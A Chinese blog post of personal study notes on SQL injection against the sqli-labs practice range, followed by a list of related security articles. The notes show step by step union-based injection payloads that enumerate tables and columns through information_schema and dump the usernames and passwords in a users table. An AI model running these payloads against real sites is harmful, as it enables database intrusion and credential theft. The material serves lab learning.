渗透学习笔记(三)--SQL注入学习(一)

最新推荐文章于 2023-05-23 12:58:05 发布
最新推荐文章于 2023-05-23 12:58:05 发布
阅读量2.6k 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51594676/article/details/122546475
版权

文章目录

使用靶场为sqli靶场
例题为GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

sql注入常见攻击思路

1:寻找到SQL注入的位置

2:判断服务器类型和后台数据库类型

3:针对不同的服务器和数据库特点进行SQL注入攻击

常见流程

  1. 首先判断sql语句闭合方式

常见的闭合方式:
id = 'input_id'
id = ('input_id')
id = "input_id"
id = ("input_id")

判断方法:
使用'或者"来进行判断,如果输入?id=1'报错,那就是单引号闭合,"类似。
在这里插入图片描述
如上图,'报错。

  1. 判断回显列数
    使用order by子句判断返回的列数。
    ?id=1' order by 5 %23

%23#的url编码,用来注释掉另一个'
order by 5发现报错
继续尝试
发现order by 3正常
在这里插入图片描述在这里插入图片描述

在这里插入图片描述

  1. 判断返回格式:

id=-1' union select 1,2,3 %23

发现2和3被回显。
在这里插入图片描述

知道返回的列名之后,就可以执行后继的操作和查询各种数据了。

例如user()查询用户名,detabase()查询当前的数据库名,version()查询数据库版本

id=-1' union select 1,database(),version() %23

在这里插入图片描述

  1. 查询出当前数据库所有的表名

id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) %23

其中group_concat()是用来把数据在一行中打印出来。
information_schema是mysql特有的库,存储各种数据库的信息
在这里插入图片描述

  1. 注入出某一个表中的全部列名
    id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='user') %23

在这里插入图片描述

  1. 获得字段内容

id=-1' union select 1,2,(select group_concat(Password) from users) %23
在这里插入图片描述
id=-1' union select 1,2,(select group_concat(username) from users) %23
在这里插入图片描述

Chiaki_0ff
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透测试知识点总结(非常详细),从零基础入门到精通,看完这一篇就够了
喜欢Python编程的程序员柚柚呀
02-10 1923
直接上货! Win2003,WinXP Mssql开启xp_cmdshell 关闭命令 开启命令 在注入点运行上述语句时,如果出现这样的回显,标记message: 配置选项 ‘xp_cmdshell’ 不存在,可执行以下语句 Mysql日志拿shell Windows提权对照表 Win下面各种文件下载姿势http://www.cnblogs.com/backlion/p/7908563.html https://www.freebuf.com/articles/system/155147.html
sqli_labs:Less-1 简要SQL注入-基于错误的单引号字符串
qq_43660551的博客
08-13 561
一、判断是否存在注入注入是字符型还是数字型。 ?id=1,正常 ?id=1' ,加上“ ' ”后,报错,所以可能存在字符型输入。 ?id=1%27--+ ,用--+注释掉以后,正常。 所以存在单引号字符型注入。 ...
SQL注入(字符型,单引号闭合)
weixin_43695031的博客
11-06 7784
SQL注入(字符型,单引号闭合) 1、判断为字符型还是整型,?为连接符 ?id=1 and 1=2 当不报错说明为字符型,反之则是整型 2、构造闭合 ?id=1’and%20 ‘1’='1 说明是单引号闭合则可以用 --+ 来注释掉后面的 ’ 例如:?id=1’ --+ 也可以用 **?id=1’**来判断,出错了就说明判断对了,因为在源语句中后面多出了一个 ’ ,所以采用上面 –+ 来注释掉后面...
SQL注入:sqli第一关详细讲解
m0_50818626的博客
05-23 1237
第七步:现在我们知道了所用的库为security,所用的表是users,三个字段名分别为id,username,password,那么我们就可以进行最后一步,查询username和password的具体数据。第六步:现在我们知道了security数据库中的所有表名,我们需要查询password和username,常理下这些数据都会存储到users中,所以我们现在查询users这个表中的所有字段的名字是什么。第二步:order by 查询字段个数,逐级增加order by 后面的数字,直到报错。
CTF从零到一 SQL注入-1
shirazawah的博客
09-14 1975
看到id=1 首先要判断是字符型还是数字型注入 根据书上方法判断数字型 id=3-2 返回页面与id=1的页面不同,说明不是数字型 加入单引号判断是否为字符型 id=1%27(这里'被转译成%27) 没有任何返回,说明有错误,存在注入。 接下来使用order by 判断表的列数。 id=1' order by 3 --+ (空格为%20 --+注释后面的语句) 显示正常 id=1' order by 4 --+ 说明一共有三列 接着我们使用un...
Sql 注入进阶理解
震山的博客
10-11 1186
第一次用 group 进行注入时写的笔记
渗透学习笔记
12-30
这份名为"渗透学习笔记"的压缩包包含了多个文本文件,涵盖了渗透测试中的一些关键领域,如MySQL注入、CMS探测、数据库探测等。以下是这些知识点的详细说明: 1. **MySQL手注大全.txt**: MySQL注入是常见的Web应用...
网络安全-渗透完整笔记
03-27
Sqlmap是一款强大的SQL注入自动化工具,用于测试数据库安全。在渗透过程中,可能会遇到需要溯源的情况,这时会用到如the-backdoor-factory等工具来创建后门。此外,msfvenom是Metasploit框架中用于生成各种类型...
e-1-6-通过sqlnamp检测sql注入漏洞-随堂笔记 .doc
10-23
SQL注入是一种常见的网络安全漏洞,攻击者通过在Web表单中插入恶意SQL语句,欺骗服务器执行非预期的数据库操作。这种漏洞可能导致数据泄露、非法权限获取,甚至整个数据库系统的瘫痪。例如,12306.cn账号和密码泄露...
一次WEB服务器渗透测试笔记
12-28
### 渗透测试知识点解析:一次WEB服务器渗透测试笔记 #### 一、渗透测试概述 渗透测试,简称“渗透”或“pentest”,是一种模拟黑客攻击的行为,旨在评估计算机网络、应用程序、操作系统或设备的安全性。它通过...
读书笔记之python渗透测试.docx
最新发布
04-13
1. **RIPS**:一款开源的PHP代码审计工具,可以自动检测PHP源代码中的潜在安全问题,如SQL注入、XSS漏洞等。 2. **Fortify SCA**:HP公司的静态代码分析工具,用于检查源代码中的安全漏洞,支持多种编程语言,包括...
sql如何取各组中ID最大值-1
知止不殆
04-18 2485
举例说明    表test id               name      record1                 a         882                 b         763                 c         664                 c         905                
sql注入 1-1_基于报错的注入
weixin_44110913的博客
12-01 1561
sql注入 1-1_ 基于报错注入 1.判断是否存在报错注入 通过 id =1 可以看到服务器返回正常页面 通过 id=1 and 1=1 通过 id=1 and 1=2 服务器也返回正常 通过 id=1’ 提交 可以看到服务器报错 通过 ’ 1’’ limit0,1 ’ 可以推测出sql语句中提交的参数为:select * from 某数据库 where id =‘id’...
SQLI -LABS靶场练习1-10
qq_45314073的博客
10-11 1923
LESS1: 1.判断是否动态网站 根据输入内容,返回不同的页面,如果是,则为动态网站,例如这里我们输入id=1与id=2返回不同的页面 2.找潜在注入点 搜索框或URL尾端加 ' 如果报错则可能存在sql注入漏洞 3.猜测后台SQL语句 select * from t_xx where xid=1…… 4.判断是数字型还是字符型 Less-1/?id=2-1 //发现与输入id=2的页面相同,也就是并没有进行运算,初步判断为字符型 注:?是否能用+判断 //不能,在浏览器里加号会.
sql注入中的union联合查询,union select 1,2,3
m0_51756263的博客
07-10 9036
sql注入中的union联合查询,union select 1,2,3
代码审计之SQL注入
weixin_38166557的博客
07-24 359
0x00概况说明 0x01报错注入及利用 环境说明 kali LAMP 0x0a 核心代码 现在注入的主要原因是程序员在写sql语句的时候还是通过最原始的语句拼接来完成,另外SQL语句有Select、Insert、Update和Delete四种类型,注入也是对这四种基本操作的拼接产生的。接下来笔者将以Select为例引导新手初步了解SQL注入。Select是数据库的查...
SQL注入基础知识总结
weixin_39157582的博客
08-16 1649
SQL注入—基础知识总结1、注释符1.1、Mysql中注释符有三种新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 1、注释符 SQL注入的时候经常会用到注释符注释掉SQL语句后边的拼接内容,在字符型参数注入中常见。 1
SQL Labs刷题补坑记录(less1-less30)
weixin_30376453的博客
08-10 324
补坑加1,这几天快速刷一下sqllabs 来巩固下sql注入基础吧,也算是把很久以前没刷的过一遍,do it! 第一部分: LESS1: 直接报错,有回显的注入, http://localhost/sqli-labs-master/Less-1/?id=1' order by 3--+ 就可以确定字段然后使用union查询即可 http://localhost/sqli-la...
SQL联合查询--理论知识
adaosanqian的博客
02-28 2369
sql注入的简单知识了解
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Chiaki_0ff

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值